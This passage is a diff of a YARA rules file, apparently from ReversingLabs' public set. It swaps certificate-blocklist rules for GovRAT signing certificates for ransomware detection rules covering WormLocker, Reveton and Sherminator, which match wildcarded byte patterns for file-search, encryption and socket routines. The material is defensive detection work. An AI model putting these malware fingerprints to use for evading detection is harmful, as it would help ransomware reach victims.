+            ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ??
+            ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F
+        }
+		$search_files = {
+            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ??
+            ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE
+            ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ??
+            ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ??
+            13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ??
+            00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ??
+            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
+            ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ??
+            11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ??
+            28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ??
+            ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11
+            ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ??
+            11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ??
+            0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16
+            11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07
+            6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Muhammad Lee" and pe.signatures [ i ] . serial == "04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $main_ransomware_function_p* ) ) and $search_files and $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects WormLocker ransomware."
 		author = "ReversingLabs"
-		id = "34275efd-b941-56f5-8e1b-30a43f1936e2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1526-L1542"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WormLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$set_environment = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ??
+            ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ??
+            ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ??
+            ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11
+            ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04
+            13 ?? 11 ?? 2D ?? 2A
+        }
+		$encrypt_files_p1 = {
+            00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73
+            ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16
+            02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ??
+            ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08
+            2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A
+        }
+		$encrypt_files_p2 = {
+            00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ??
+            ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures [ i ] . serial == "65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $set_environment ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Reveton : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Reveton ransomware."
 		author = "ReversingLabs"
-		id = "45c37c98-1006-51e4-8832-b8e5c9fba416"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "14446b94-cd57-5930-b0af-b21091b61f68"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1544-L1560"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Reveton.yara#L1-L118"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2d316c558cdb5591788ef89c6e20327882a118f2928f4a31fb5b8b3083931ac5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Reveton"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$http_connection_1 = {
+            C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 E8 ?? ?? ?? ?? 50 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 06 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? 8B 45 ?? 50 53 E8 ?? ?? ?? ?? 8B 55 ?? 8B 06 8B 4D ?? E8 ?? ?? ?? ?? 83
+            7D ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
+        }
+		$raw_socket_connection_1_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D
+            ?? 89 55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 8E ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B CF E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+        }
+		$raw_socket_connection_1_2 = {
+            C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? 33 C0 EB ?? B0 ?? 84 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? FE C8 74 ?? 2C ?? 74
+            ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ??
+            ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 95
+            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? E8
+        }
+		$raw_socket_connection_1_3 = {
+            66 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F B6 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CF
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85
+            C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 40 ?? 8B 00 8B 00
+            89 85 ?? ?? ?? ?? 8A 94 3D ?? ?? ?? ?? 8A 84 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8
+        }
+		$raw_socket_connection_1_4 = {
+            8B 55 ?? 8B C6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B
+            00 50 E8 ?? ?? ?? ?? 40 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? 8B 00
+            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B 00 50 E8
+        }
+		$raw_socket_connection_1_5 = {
+            C6 85 ?? ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 66
+            8B 85 ?? ?? ?? ?? 8B D0 66 81 E2 ?? ?? 88 95 ?? ?? ?? ?? 0F B7 C0 C1 E8 ?? 88 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? 40 74 ?? B3 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3
+        }
+		$file_search_1_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 C3 85 DB 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74 ?? 8B 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 80 38 ?? 75 ??
+            8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8
+        }
+		$file_search_1_2 = {
+            8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84 ?? ??
+            ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6 8B D0
+            03 D3 42 81 FA ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 50 56 8D 85 ?? ?? ?? ?? 03 C3 50 E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+        }
+		$file_search_1_3 = {
+            8B F0 83 FE ?? 74 ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 53 ??
+            03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3 48 50 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$raw_socket_connection_2 = {
+            55 8B EC 83 C4 ?? 53 56 8B F2 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 8D 45 ??
+            33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 8B C6 86 E0 66 89 45 ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B C3 E8
+            ?? ?? ?? ?? 83 CB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ??
+            C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Marc Chapon" and pe.signatures [ i ] . serial == "12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $http_connection_1 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 and $raw_socket_connection_1_1 and $raw_socket_connection_1_2 and $raw_socket_connection_1_3 and $raw_socket_connection_1_4 and $raw_socket_connection_1_5 ) or ( $raw_socket_connection_2 and $file_search_1_1 and $file_search_1_2 and $file_search_1_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Sherminator ransomware."
 		author = "ReversingLabs"
-		id = "8759a40a-648e-548e-a519-bedc812aefe4"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "99792a22-8027-557f-927f-30eac4d1e690"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1562-L1580"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sherminator"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_resources_p1 = {
+            55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24
+            ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ??
+            ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54
+            24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89
+            45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89
+        }
+		$enum_resources_p2 = {
+            45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
+            ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
+            ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ??
+            ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ??
+            ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2
+            AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ??
+            8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0
+            ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45
+            ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01
